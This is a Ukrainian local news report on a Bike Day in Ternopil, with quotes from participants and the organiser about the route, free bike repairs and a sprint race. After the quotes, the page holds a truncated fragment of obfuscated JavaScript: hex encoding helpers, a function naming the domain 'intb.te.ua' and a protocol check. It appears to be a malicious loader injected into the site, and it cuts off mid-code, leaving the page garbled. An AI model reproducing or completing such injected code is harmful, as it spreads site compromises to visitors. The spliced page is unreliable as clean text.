Ви знаходитесь: Головна / Новини / У Тернополі відбувся велодень
У Тернополі відбувся велодень

У Тернополі відбувся велодень

Близько трьох сотень любителів велосипедів, з них більше п’ятдесяти дівчат, спокійно проводити недільний ранок відмовилися. Натомість, взяли своїх двоколісних друзів і приїхали на Театральний майдан, відзначити «Всеукраїнський Велодень». Для прикладу, Марічка з друзями для цього приїхала електричкою аж з Борщова.

МАРІЧКА, учасниця Велодня (м. Борщів)

«Того року їздила до Польщі велосипедом, цього року також плануємо їхати до Польщі і, думаю, що також буде супер. Бо того року було дуже гарно. Цього року їдемо до Кракова на Всесвітній з’їзд молоді. За 10 днів ми проїхали 1500 км. В нас була польова кухня з собою і нас годували, було гарно».

Натомість, в програмі велопробіг значно менший, протяжністю 15-20 кілометрів. Однак, на цьому святкування не завершиться.

АНТОН ОДОБЕЦЬКИЙ, голова «Асоціації велосипедистів Тернопілля»

«Ми їдемо зараз по проспекту Бандери на вулицю 15 квітня, Київську і повертаємося в центр, на Дружбу і назад до Театрального майдану. Крім проїзду буде громадський велоремонт, кожна людина може отримати такий невеличкий ремонт велосипеда. Зрозуміло, що не повний ремонт, а підналаштувати, подивитися. Також ще буде гонка, це такий велоспринт, коротка дистанція, парна гонка».

За словами Антона Одобецького, мета акції не показати, як швидко велосипедисти їздять, а те, що їх в місті багато і може бути ще більше. А про те, що це корисно як для здоров’я, так і для екосистеми, знають, навіть, діти, які також приїхали зі своїми двоколісними друзями на Велодень. До велопробігу вони вже готові.

САША

«Завжди готовий».

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top